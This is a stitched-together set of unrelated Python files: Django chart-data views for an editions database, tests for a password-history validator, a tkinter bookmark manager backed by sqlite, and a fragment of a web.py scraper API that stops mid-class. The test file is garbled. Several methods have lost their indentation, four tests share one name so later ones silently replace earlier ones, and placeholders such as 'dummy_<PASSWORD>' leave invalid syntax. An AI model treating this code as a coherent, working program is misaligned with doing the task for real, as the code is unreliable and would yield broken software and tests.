    data = {
        "items": len(Edition.objects.all()),
        "title": "Advanced Search Functionalites",
        "subtitle": "Are there any advanced search functionalites available?",
        "legendx": "advanced search",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def search_json(request):
    """Return JSON chart data: is the edition full-text searchable?"""
    editions = Edition.objects.values(
        'search').annotate(total=Count('search')).order_by('-total')
    # one [legend, count] row per non-null search value
    payload = [[row["search"], row["total"]]
               for row in editions if row["search"] is not None]
    data = {
        "items": len(Edition.objects.all()),
        "title": "Full Text Search",
        "subtitle": "Is the work searchable in its full text (string match search)?",
        "legendx": "searchable",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def historical_periode_json(request):
    """Return JSON chart data counting editions per historical period."""
    editions = Edition.objects.values(
        'historical_period').annotate(total=Count('historical_period')).order_by('-total')
    # Fetch all referenced Period rows in ONE query instead of one
    # Period.objects.get() per aggregate row (classic N+1 pattern);
    # .get() would also have crashed the endpoint on a dangling id.
    period_ids = [x["historical_period"] for x in editions
                  if x["historical_period"] is not None]
    periods = Period.objects.in_bulk(period_ids)
    payload = []
    for x in editions:
        period = periods.get(x["historical_period"])
        if period is not None:
            payload.append([period.name, x['total']])
    data = {
        "items": len(Edition.objects.all()),
        "title": "Editions per Period",
        "subtitle": "Distribution of Editions over Periods",
        "legendx": "Historical Periods",
        "legendy": "# of Editions",
        "measuredObject": "Editions",
        "ymin": 0,
        "payload": payload
    }
    return JsonResponse(data)
def test_json(request):
    """Serve the static demo bar-chart payload (DATA)."""
    return JsonResponse(DATA)
def test_json_pie(request):
    """Serve the static demo pie-chart payload (DATA_PIECHART)."""
    return JsonResponse(DATA_PIECHART)
|
from django.contrib.auth import get_user_model
from django.contrib.auth.password_validation import validate_password
from django.core.exceptions import ValidationError
from django.test import TestCase, override_settings
from django_password_validators.password_history.password_validation import UniquePasswordsValidator
from django_password_validators.password_history.hashers import (
HistoryVeryStrongHasher,
HistoryHasher
)
from django_password_validators.password_history.models import (
UserPasswordHistoryConfig,
PasswordHistory
)
from .base import PasswordsTestCase
class UniquePasswordsValidatorTestCase(PasswordsTestCase):
    def test_create_user(self):
        # Creating one user must record exactly one password-history entry
        # and one per-user history config.
        self.create_user(1)
        self.assertEqual(PasswordHistory.objects.all().count(), 1)
        self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 1)
def test_none_user(self):
dummy_user = get_user_model()
upv = UniquePasswordsValidator()
upv.validate('qwerty', None)
upv.password_changed('<PASSWORD>', None)
self.assertEqual(PasswordHistory.objects.all().count(), 0)
self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 0)
def test_not_saved_user(self):
dummy_user = get_user_model()
upv = UniquePasswordsValidator()
upv.validate('qwerty', dummy_user)
upv.password_changed('<PASSWORD>', dummy_<PASSWORD>)
dummy_user = get_user_model()()
upv = UniquePasswordsValidator()
upv.validate('qwerty', dummy_user)
upv.password_changed('<PASSWORD>', dummy_<PASSWORD>)
self.assertEqual(PasswordHistory.objects.all().count(), 0)
self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 0)
    def test_create_multiple_users(self):
        # Each created user gets its own history config and one stored hash.
        self.create_user(1)
        self.create_user(2)
        self.assertEqual(PasswordHistory.objects.all().count(), 2)
        self.assertEqual(UserPasswordHistoryConfig.objects.all().count(), 2)
    def test_user_changed_password(self):
        # Re-setting a password already in the history must not create a
        # duplicate hash entry; a genuinely new password must be stored.
        self.create_user(1)
        self.user_change_password(user_number=1, password_number=2)
        # We check that there are no duplicate hashes passwords in the database
        self.user_change_password(user_number=1, password_number=2)
        # They must be only two hashes
        self.assertEqual(PasswordHistory.objects.all().count(), 2)
        # password 2 is known (rejected); password 3 is still unknown
        self.assert_password_validation_False(user_number=1, password_number=2)
        self.assert_password_validation_True(user_number=1, password_number=3)
        self.user_change_password(user_number=1, password_number=3)
        self.assert_password_validation_False(user_number=1, password_number=3)
    def test_change_number_hasher_iterations(self):
        # Hashes recorded with the default hasher must still be matched
        # after switching to a hasher with more iterations; passwords
        # stored afterwards use the stronger hasher's iteration count.
        self.create_user(1)
        self.user_change_password(user_number=1, password_number=2)
        with self.settings(
                DPV_DEFAULT_HISTORY_HASHER='django_password_validators.password_history.hashers.HistoryVeryStrongHasher'):
            # passwords 1 and 2 were stored under the old hasher but must
            # still be recognised (and rejected) under the new one
            self.assert_password_validation_False(
                user_number=1,
                password_number=1
            )
            self.assert_password_validation_False(
                user_number=1,
                password_number=2
            )
            # password 3 has never been used
            self.assert_password_validation_True(
                user_number=1,
                password_number=3
            )
            self.user_change_password(
                user_number=1,
                password_number=3
            )
            self.assert_password_validation_False(
                user_number=1,
                password_number=3
            )
        # two hashes under the default iteration count, one under the
        # strong hasher's count
        self.assertEqual(
            PasswordHistory.objects.filter(
                user_config__iterations=HistoryHasher.iterations).count(),
            2,
        )
        self.assertEqual(
            PasswordHistory.objects.filter(
                user_config__iterations=HistoryVeryStrongHasher.iterations).count(),
            1,
        )
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 0
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 3)
    @override_settings(AUTH_PASSWORD_VALIDATORS=[{
        'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
        'OPTIONS': {
            'last_passwords': 1
        }
    }])
    def test_last_password__1_pass_history(self):
        # last_passwords=1: only the most recent password stays in scope.
        user1 = self.create_user(1)
        user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
        PasswordHistory.objects.filter(user_config=user_config_1).delete()
        # This password cannot be taken during validation. It is out of range.
        # It is the oldest so out of range.
        self.user_change_password(user_number=1, password_number=2)
        self.user_change_password(user_number=1, password_number=1)
        self.user_change_password(user_number=1, password_number=3)
        # Password out of scope. We interpret it as if it had never been entered.
        self.assert_password_validation_True(user_number=1, password_number=2)
        # Password out of scope. We interpret it as if it had never been entered.
        self.assert_password_validation_True(user_number=1, password_number=1)
        # Passwords known in the scope we are checking
        self.assert_password_validation_False(user_number=1, password_number=3)
        # New unknown password
        self.assert_password_validation_True(user_number=1, password_number=4)
        self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 1)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 2
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Password out of scope. We interpret it as if it had never been entered.
self.assert_password_validation_True(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 2)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 3
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 3)
@override_settings(AUTH_PASSWORD_VALIDATORS=[{
'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
'OPTIONS': {
'last_passwords': 4
}
}])
def test_last_password__1_pass_history(self):
user1 = self.create_user(1)
user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
PasswordHistory.objects.filter(user_config=user_config_1).delete()
# This password cannot be taken during validation. It is out of range.
# It is the oldest so out of range.
self.user_change_password(user_number=1, password_number=2)
self.user_change_password(user_number=1, password_number=1)
self.user_change_password(user_number=1, password_number=3)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=2)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=1)
# Passwords known in the scope we are checking
self.assert_password_validation_False(user_number=1, password_number=3)
# New unknown password
self.assert_password_validation_True(user_number=1, password_number=4)
self.assertEqual(PasswordHistory.objects.filter(user_config__user=user1).count(), 3)
    @override_settings(AUTH_PASSWORD_VALIDATORS=[{
        'NAME': 'django_password_validators.password_history.password_validation.UniquePasswordsValidator',
        'OPTIONS': {
            'last_passwords': 2
        }
    }])
    def test_last_password(self):
        # End-to-end check of the last_passwords=2 window over several
        # password changes, plus isolation between two users' histories.
        user1 = self.create_user(1)
        user2 = self.create_user(2)  # needed to check if we are not deleting passwords from another user
        user_config_1 = UserPasswordHistoryConfig.objects.filter(user=user1)[0]
        user_config_2 = UserPasswordHistoryConfig.objects.filter(user=user2)[0]
        PasswordHistory.objects.filter(user_config=user_config_1).delete()
        # This password cannot be taken during validation. It is out of range.
        # It is the oldest so out of range.
        self.user_change_password(user_number=1, password_number=2)
        self.user_change_password(user_number=1, password_number=1)
        self.user_change_password(user_number=1, password_number=3)
        # Password out of scope. We interpret it as if it had never been entered.
        self.assert_password_validation_True(user_number=1, password_number=2)
        # New unknown password
        self.assert_password_validation_True(user_number=1, password_number=4)
        # Passwords known in the scope we are checking
        self.assert_password_validation_False(user_number=1, password_number=1)
        self.assert_password_validation_False(user_number=1, password_number=3)
        self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_1).count(), 2)
        self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_2).count(), 1)
        # Two new non-existent passwords
        self.user_change_password(user_number=1, password_number=4)
        self.user_change_password(user_number=1, password_number=2)
        # Password out of scope. We interpret it as if it had never been entered.
        self.assert_password_validation_True(user_number=1, password_number=1)
        self.assert_password_validation_True(user_number=1, password_number=3)
        # Passwords known in the scope we are checking
        self.assert_password_validation_False(user_number=1, password_number=4)
        self.assert_password_validation_False(user_number=1, password_number=2)
        self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_1).count(), 2)
        # We check for interaction with the other user
        self.assert_password_validation_False(user_number=2, password_number=1)
        self.assert_password_validation_True(user_number=2, password_number=2)
        self.assert_password_validation_True(user_number=2, password_number=3)
        self.assert_password_validation_True(user_number=2, password_number=4)
        self.assertEqual(PasswordHistory.objects.filter(user_config=user_config_2).count(), 1)
def test_last_password__delete_old_passwords__one_user__infinite_passwords_hist(self):
    """last_passwords <= 0 disables pruning: no history entry is ever deleted."""
    user = self.create_user(1)
    PasswordHistory.objects.filter(user_config__user=user).delete()
    config = UserPasswordHistoryConfig.objects.filter(user=user)[0]
    entries = []
    for _ in range(3):
        entry = PasswordHistory(user_config=config, password='<PASSWORD>')
        entry.save()
        entries.append(entry)
    # Neither a zero nor a negative limit may trigger any deletion.
    for limit in (0, -1):
        validator = UniquePasswordsValidator(last_passwords=limit)
        validator.delete_old_passwords(user)
    remaining = list(
        PasswordHistory.objects.filter(user_config__user=user)
        .values_list('pk', flat=True)
        .order_by('pk')
    )
    self.assertEqual(
        remaining,
        [entry.pk for entry in entries],
    )
def test_last_password__delete_old_passwords__one_user__one_password_hist(self):
    """With last_passwords=1 only the newest history entry survives."""
    user = self.create_user(1)
    config = UserPasswordHistoryConfig.objects.filter(user=user)[0]
    entries = []
    for _ in range(3):
        entry = PasswordHistory(user_config=config, password='<PASSWORD>')
        entry.save()
        entries.append(entry)
    UniquePasswordsValidator(last_passwords=1).delete_old_passwords(user)
    remaining = list(
        PasswordHistory.objects.filter(user_config__user=user)
        .values_list('pk', flat=True)
        .order_by('pk')
    )
    # Only the last saved entry may remain.
    self.assertEqual(
        remaining,
        [entries[-1].pk],
    )
def test_last_password__delete_old_passwords__one_user__two_passwords_hist(self):
    """With last_passwords=2 only the two newest history entries survive."""
    user = self.create_user(1)
    config = UserPasswordHistoryConfig.objects.filter(user=user)[0]
    entries = []
    for _ in range(3):
        entry = PasswordHistory(user_config=config, password='<PASSWORD>')
        entry.save()
        entries.append(entry)
    UniquePasswordsValidator(last_passwords=2).delete_old_passwords(user)
    remaining = list(
        PasswordHistory.objects.filter(user_config__user=user)
        .values_list('pk', flat=True)
        .order_by('pk')
    )
    # The oldest entry is gone, the two newest remain.
    self.assertEqual(
        remaining,
        [entries[1].pk, entries[2].pk],
    )
def test_last_password__delete_old_passwords__one_user__three_passwords_hist(self):
    """With last_passwords=3 and exactly three entries, nothing is deleted."""
    user = self.create_user(1)
    config = UserPasswordHistoryConfig.objects.filter(user=user)[0]
    entries = []
    for _ in range(3):
        entry = PasswordHistory(user_config=config, password='<PASSWORD>')
        entry.save()
        entries.append(entry)
    UniquePasswordsValidator(last_passwords=3).delete_old_passwords(user)
    remaining = list(
        PasswordHistory.objects.filter(user_config__user=user)
        .values_list('pk', flat=True)
        .order_by('pk')
    )
    # All three entries are within the retention window.
    self.assertEqual(
        remaining,
        [entry.pk for entry in entries],
    )
def test_last_password__delete_old_passwords__two_users(self):
    """Pruning one user's history must not touch the other user's entries."""
    user_a = self.create_user(1)
    user_b = self.create_user(2)
    PasswordHistory.objects.all().delete()
    config_a = UserPasswordHistoryConfig.objects.filter(user=user_a)[0]
    config_b = UserPasswordHistoryConfig.objects.filter(user=user_b)[0]
    a_entries = []
    b_entries = []
    # Interleave creation so both users age their entries in lockstep.
    for _ in range(3):
        entry_a = PasswordHistory(user_config=config_a, password='<PASSWORD>')
        entry_a.save()
        a_entries.append(entry_a)
        entry_b = PasswordHistory(user_config=config_b, password='<PASSWORD>')
        entry_b.save()
        b_entries.append(entry_b)
    UniquePasswordsValidator(last_passwords=2).delete_old_passwords(user_a)
    remaining_a = list(
        PasswordHistory.objects
        .filter(user_config__user=user_a)
        .values_list('pk', flat=True)
        .order_by('pk')
    )
    self.assertEqual(
        remaining_a,
        [a_entries[1].pk, a_entries[2].pk],
        msg='Only the passwords of the first user can be deleted'
    )
    remaining_b = list(
        PasswordHistory.objects
        .filter(user_config__user=user_b)
        .values_list('pk', flat=True)
        .order_by('pk')
    )
    self.assertEqual(
        remaining_b,
        [b_entries[0].pk, b_entries[1].pk, b_entries[2].pk],
        msg='Password history of the other user must be unchanged'
    )
def test_last_password__delete_old_passwords__multiple_UserPasswordHistoryConfig(self):
    """Pruning spans all history configs of a user: the oldest entry goes."""
    user = self.create_user(1)
    PasswordHistory.objects.all().delete()
    config_a = UserPasswordHistoryConfig.objects.filter(user=user)[0]
    config_b = UserPasswordHistoryConfig(user=user, salt='qwerty', iterations=10)
    config_b.save()

    def remaining_pks():
        # Current history pks for the user, oldest first.
        return list(
            PasswordHistory.objects.filter(user_config__user=user)
            .values_list('pk', flat=True)
            .order_by('pk')
        )

    # Each scenario creates three entries oldest-first; the config each entry
    # belongs to varies, but the oldest entry must always be the only one
    # removed when keeping the last two passwords.
    scenarios = [
        (config_a, config_b, config_a),
        (config_b, config_a, config_a),
        (config_b, config_a, config_b),
    ]
    for configs in scenarios:
        entries = []
        for cfg in configs:
            entry = PasswordHistory(user_config=cfg, password='<PASSWORD>')
            entry.save()
            entries.append(entry)
        UniquePasswordsValidator(last_passwords=2).delete_old_passwords(user)
        self.assertEqual(
            remaining_pks(),
            [entries[1].pk, entries[2].pk],
            msg='Only the oldest password can be deleted = ph1'
        )
        PasswordHistory.objects.all().delete()
|
from tkinter import *
from tkinter import messagebox
from io import open
import sqlite3
#Functions
#savebookmark: Create the database and save the bookmark
def savebookmark():
    """Create the DB table / HTML file on first use, then insert the bookmark.

    Reads the label, bookmark name and URL from the three Entry widgets;
    an empty label is replaced by "Temporary markers". Regenerates the
    HTML page afterwards.
    """
    # First run: create the table and an empty HTML file. If the table
    # already exists sqlite3 raises OperationalError and we fall through.
    try:
        myconnection = sqlite3.connect("BBDD")
        mycursor = myconnection.cursor()
        mycursor.execute("CREATE TABLE BOOKMARKS (LABEL VARCHAR(50), BOOKMARK VARCHAR(50) UNIQUE, URL VARCHAR(5000))")
        with open("file.html", "w"):
            pass
    except sqlite3.OperationalError:
        pass  # table (and HTML file) already exist
    finally:
        myconnection = sqlite3.connect("BBDD")
        mycursor = myconnection.cursor()
        if entrybookmark.get() != '' and entryurl.get() != '':
            try:
                if entrylabel.get() == '':
                    strlabel.set("Temporary markers")
                # Parameterized query: the previous string concatenation was
                # vulnerable to SQL injection and broke on quotes in the input.
                mycursor.execute(
                    "INSERT INTO BOOKMARKS VALUES(?, ?, ?)",
                    (entrylabel.get(), entrybookmark.get(), entryurl.get()),
                )
                messagebox.showinfo("Bookmark Created", "The bookmark has been created: " + entrybookmark.get())
            except sqlite3.IntegrityError:
                # UNIQUE constraint on BOOKMARK: the bookmark already exists.
                messagebox.showerror("Error", "The bookmark already exists")
        else:
            # Bookmark name and/or URL missing.
            messagebox.showerror("Error", "Insufficient information, make sure you get the name and URL fields")
        myconnection.commit()
        myconnection.close()
        writehtml()
#writehtml: Write the bookmarks
def writehtml():
    """Regenerate file.html with all bookmarks grouped by label.

    The active CSS theme (1-3) is written as an HTML comment whose digit
    always lands at character offset 80 of the file; when no radio button
    has been selected yet (value 0) the previous theme is recovered from
    that offset.
    """
    try:
        varcss = radiovarcss.get()
        if varcss == 0:
            # Recover the previously used theme from the marker digit,
            # defaulting to theme 1 on any problem. `> 80` (not `>= 80`)
            # avoids the IndexError the old code hit when len(tex) == 80.
            try:
                with open("file.html", "r") as html_file:
                    tex = html_file.read()
                if len(tex) > 80 and tex[80] in ('1', '2', '3'):
                    varcss = int(tex[80])
                else:
                    varcss = 1
            except (OSError, IOError, ValueError):
                varcss = 1
        myconnection = sqlite3.connect("BBDD")
        mycursor = myconnection.cursor()
        # Query BEFORE opening the file for writing: the old code truncated
        # file.html first, wiping the page whenever the table was missing.
        mycursor.execute("SELECT * FROM BOOKMARKS ")
        bookmarkslist = mycursor.fetchall()
        # Unique labels in first-seen order.
        labellist = []
        for row in bookmarkslist:
            if row[0] not in labellist:
                labellist.append(row[0])
        with open("file.html", "w") as html_file:
            html_file.write('<!DOCTYPE html>\n<html>\n<head>\n<title>Enlaces</title>\n<meta charset="utf-8">')
            # Theme marker comment: the digit must stay at offset 80.
            if varcss == 1:
                html_file.write('\n<!--1-->\n<style type="text/css">\nbody{font-family:Century Gothic;background:rgb(25,25,25);text-decoration:none;}\n.Clases{display:grid;grid-template-columns:1fr 1fr 1fr;}\n.Clase{ background-color:rgba(44,44,44,1);text-align:center;border-style:solid;border-width:10px;border-color:rgba(34,34,34,1); border-collapse:collapse;margin:10px;}\n.Clase h3{font-size:25px;color:rgba(163,48,48,1);margin:20px;padding:0px;}\n.Clase a{text-decoration:none;color:rgba(250,250,250,1);}\n</style>')
            elif varcss == 2:
                html_file.write('\n<!--2-->\n<style type="text/css">\nbody{font-family:Century Gothic;background:rgb(50,137,124);text-decoration:none;}\n.Clases{display:grid;grid-template-columns:1fr 1fr 1fr;}\n.Clase{ background-color:rgba(74,184,173,1);text-align:center;border-style:solid;border-width:10px;border-color:rgba(248,181,50,1);border-collapse:collapse;margin:10px;}\n.Clase h3{font-size:25px;color:rgba(255,73,25,1);margin:20px;padding:0px;}\n.Clase a{text-decoration:none;color:rgba(250,250,250,1);}\n</style>')
            elif varcss == 3:
                html_file.write('\n<!--3-->\n<style type="text/css">\nbody{font-family:Century Gothic;background:rgb(7,30,37);text-decoration:none;}\n.Clases{display:grid;grid-template-columns:1fr 1fr 1fr;}\n.Clase{ background-color:rgba(6,57,75,1);text-align:center;border-style:solid;border-width:10px;border-color:rgba(34,160,182,1);border-collapse:collapse;margin:10px;}\n.Clase h3{font-size:25px;color:rgba(203,12,69,1);margin:20px;padding:0px;}\n.Clase a{text-decoration:none;color:rgba(250,250,250,1);}\n</style>')
            html_file.write('\n</head>\n<body><section class="Clases">')
            # One <section> per label, containing its bookmarks as links.
            for label in labellist:
                if label != labellist[0]:
                    html_file.write('</section>')
                html_file.write('<section class="Clase">')
                html_file.write('<h3>' + str(label) + '</h3> <br / > \n')
                for row in bookmarkslist:
                    if label == row[0]:
                        html_file.write('<a href="' + str(row[2]) + '">' + str(row[1]) + '</a> <br / > \n')
            html_file.write('</section></body>\n</html>')
        myconnection.close()
    except sqlite3.Error:
        # No database/table yet: nothing to render (deliberate best-effort).
        pass
#deletebookmark: Delete the marker and if it is the case delete the Label with all its markers
def deletebookmark():
    """Delete one bookmark by name, or a whole label with all its bookmarks.

    If the bookmark entry is filled, that single bookmark is deleted (after
    confirmation); otherwise, if only the label entry is filled, every
    bookmark under that label is deleted. The HTML page is regenerated.
    """
    try:
        myconnection = sqlite3.connect("BBDD")
        mycursor = myconnection.cursor()
        mycursor.execute("SELECT * FROM BOOKMARKS ")
        bookmarkslist = mycursor.fetchall()
        if entrybookmark.get() != '':
            # Delete a single bookmark by name.
            target = entrybookmark.get()
            if target in [row[1] for row in bookmarkslist]:
                if messagebox.askyesno("Are you sure you want to delete? ", " Are you sure you want to delete the bookmark " + target + "?"):
                    # Parameterized to avoid SQL injection / quote breakage.
                    mycursor.execute("DELETE FROM BOOKMARKS WHERE BOOKMARK=?", (target,))
            elif bookmarkslist:
                # Matches the old loop: the error only appeared when the
                # table was non-empty and no row matched.
                messagebox.showerror("Error ", " Cannot find a bookmark named: " + target)
        elif entrylabel.get() != '':
            # Delete every bookmark under the given label. A single DELETE
            # suffices; the old code re-ran it once per row.
            label = entrylabel.get()
            if label in [row[0] for row in bookmarkslist]:
                if messagebox.askyesno("Are you sure you want to delete? ", " Are you sure you want to delete the label " + label + "?"):
                    mycursor.execute("DELETE FROM BOOKMARKS WHERE LABEL=?", (label,))
            elif bookmarkslist:
                messagebox.showerror("Error ", " Cannot find a tag named: " + label)
        else:
            # Neither field filled in.
            messagebox.showerror("Error ", " The marker or tag name cannot be found or is incorrect")
        myconnection.commit()
        myconnection.close()
        writehtml()
    except sqlite3.Error:
        # Table does not exist yet: nothing to delete (deliberate best-effort).
        pass
#Graphic interface
#Root, frame and configuration
root = Tk()
root.resizable(False, False)
root.title("BookMarks")
frame = Frame(root)
frame.pack()
#StringVars backing the three entry widgets
strlabel = StringVar()
strbookmark = StringVar()
strurl = StringVar()
#Entrys
entrylabel = Entry(frame, textvariable=strlabel)
entrylabel.grid(row=0, column=1, padx=10, pady=10)
entrybookmark = Entry(frame, textvariable=strbookmark)
entrybookmark.grid(row=1, column=1, padx=10, pady=10)
entryurl = Entry(frame, textvariable=strurl)
entryurl.grid(row=2, column=1, padx=10, pady=10)
#Labels
entryla = Label(frame, text="Label")
entryla.grid(row=0, column=0, sticky="w", padx=10, pady=10)
entrybook = Label(frame, text="Bookmark")
entrybook.grid(row=1, column=0, sticky="w", padx=10, pady=10)
entryur = Label(frame, text="URL")
entryur.grid(row=2, column=0, sticky="w", padx=10, pady=10)
entrystyle = Label(frame, text="Page style:")
entrystyle.grid(row=4, column=0, sticky="w", padx=10, pady=10)
#Buttons: each gets its own variable (the delete and rewrite buttons both
#used the name "botonborrar"), and the rewrite label's "Eewrite" typo is fixed.
savebutton = Button(frame, text="Save", command=savebookmark)
savebutton.grid(row=3, column=0, sticky="w", padx=10, pady=10)
deletebutton = Button(frame, text="Delete", command=deletebookmark)
deletebutton.grid(row=3, column=1, sticky="w", padx=10, pady=10)
rewritebutton = Button(frame, text="Rewrite HTML", command=writehtml)
rewritebutton.grid(row=3, column=2, sticky="w", padx=10, pady=10)
#Radio buttons selecting the CSS theme (0 = recover previous theme)
radiovarcss = IntVar()
Radiobutton(root, text="Night", variable=radiovarcss, value=1, command=writehtml).pack()
Radiobutton(root, text="Day", variable=radiovarcss, value=2, command=writehtml).pack()
Radiobutton(root, text="Cyberpunk", variable=radiovarcss, value=3, command=writehtml).pack()
# Run the event loop on the root window; the old `root = mainloop()` called
# the module-level tkinter function and pointlessly rebound `root` to None.
root.mainloop()
|
<reponame>chongiadung/choinho
#!/usr/bin/env python
# encoding: utf-8
"""
scraper_webapp.py
Created by <NAME> on 2013-01-09.
Copyright (c) 2013 CGD Inc. All rights reserved.
"""
import json
from common import util_crawler as uc
import web
import os
import config
from common import util_rest as ur
import crawled_products_service as cps
import scraper_service as ss
import monitor_crawler_service as mcs
from service import crawl_url_script as cus
import requests
import logging
#import xmltodict
# URL-pattern -> handler-class mapping consumed by web.application() in main().
urls = (
    '/help', 'help',
    # crawler api
    '/crawler/generate', 'generate',
    '/crawler/startcrawl', 'startcrawl',
    '/crawler/stopcrawl', 'stopcrawl',
    '/crawler/taillog', 'taillog',
    '/crawler/delete_source', 'delete_source',
    '/crawler/thread_count', 'thread_count',
    '/crawler/stopSpiders', 'stopSpiders',
    '/crawler/insert_spider', 'insert_spider',
    '/crawler/check_parse_item', 'checkParseItem',
    '/crawler/crawl_product', 'crawlProduct',
    '/crawler/debugCrawler', 'debugCrawler',
    '/crawler/debugCrawler/fixBug', 'fixBug',
    '/crawler/delete', 'delete',
    '/crawler/spider_history', 'spider_history',
    '/crawler/update_category_blacklist', 'update_category_blacklist',
    # Statistic api
    '/stats/crawled_products', 'crawled_products',
    '/stats/onlinefriday', 'onlinefriday',
    # san_gia api
    '/san_gia/sangia_products', 'sangia_products',
    # kpi crawler
    '/kpi/spiders_started', 'number_spiders_started',
    '/kpi/spiders_stopped', 'number_spiders_stopped',
    '/kpi/spiders_created', 'number_spiders_created',
    # '/kpi/spiders_delete', 'number_spiders_delete',
    '/kpi/items_crawled', 'number_items_crawled'
)
# Seconds in one day (appears unused within this chunk — TODO confirm callers).
NUM_SECONDS_IN_A_DAY = 60 * 60 * 24
#docs for help
# Each handler class registers its own entry at class-definition time;
# the /help endpoint renders this dict via ur.formatDocs().
docs = {}
class delete:
    """Delete a spider file of the given type via the scraper service."""
    # NOTE: the query parameter is `_type`; the old help text advertised
    # `type_file`, which the handler never read.
    docs['del_file'] = [
        ('method', 'GET'),
        ('path', '/crawler/delete?spider_name=...&_type=...'),
        ('description', 'delete spider python file')
    ]
    def GET(self):
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        params = web.input(spider_name=None, _type=None)
        spider_name = params.spider_name
        _type = params._type
        # Both parameters are required; `not x` covers None and ''.
        if not spider_name or not _type:
            return "Spider_name or type_file is None!"
        return ss.delete(spider_name, _type)
class stopSpiders:
    # Help metadata rendered by the /help endpoint.
    docs['stopSpiders'] = [
        ('method', 'GET'),
        ('path', '/crawler/stopSpiders'),
        ('description', 'stop all running spiders')
    ]
    def GET(self):
        """Stop every running spider; returns the service's response."""
        web.header('Content-Type', 'application/json; charset=UTF-8')
        web.header('Access-Control-Allow-Origin','*')
        return ss.stopAllSpider()
class help:
    def GET(self):
        """Render the plain-text API documentation collected in `docs`."""
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin','*')
        return ur.formatDocs('Scraper API:', docs)
class generate:
    """Generate the source file for a spider, optionally overwriting it."""
    # FIX: the old help path said `overWrite=...` but the handler reads
    # `over_write`, so callers following the docs had no effect.
    docs['generate'] = [
        ('method', 'GET'),
        ('path', '/crawler/generate?spider=...&over_write=true/false'),
        ('description', 'generate spider')
    ]
    def GET(self):
        params = web.input(spider=None, over_write='false')
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        spider = params.spider
        over_write = params.over_write
        # Identity check: web.input returns None when the param is absent.
        if spider is None:
            return 'Missing spider name: spider=...'
        response = ss.generateSpider(spider, over_write)
        return response
class checkParseItem:
    """Parse an item from the given URL using the configured xpaths."""
    docs['checkParseItem'] = [
        ('method', 'GET'),
        ('path', '/crawler/check_parse_item?url=...'),
        ('description', 'Use xpath to parse item from url')
    ]
    def GET(self):
        # BUG FIX: was web.input(spider=None); without a default for `url`,
        # accessing params.url raised AttributeError when ?url= was missing.
        params = web.input(url=None)
        web.header('Content-Type', 'text/plain; charset=UTF-8')
        web.header('Access-Control-Allow-Origin', '*')
        url = params.url
        if url is None:
            return 'Missing Url: url=...'
        response = ss.check_parse_item(url)
        return json.dumps(response)
class delete_source:
    """Delete all crawled items belonging to a source."""
    docs['delete_source'] = [
        ('method', 'GET'),
        ('path', '/crawler/delete_source?source=...'),
        ('description', 'delete items from source')
    ]
    def GET(self):
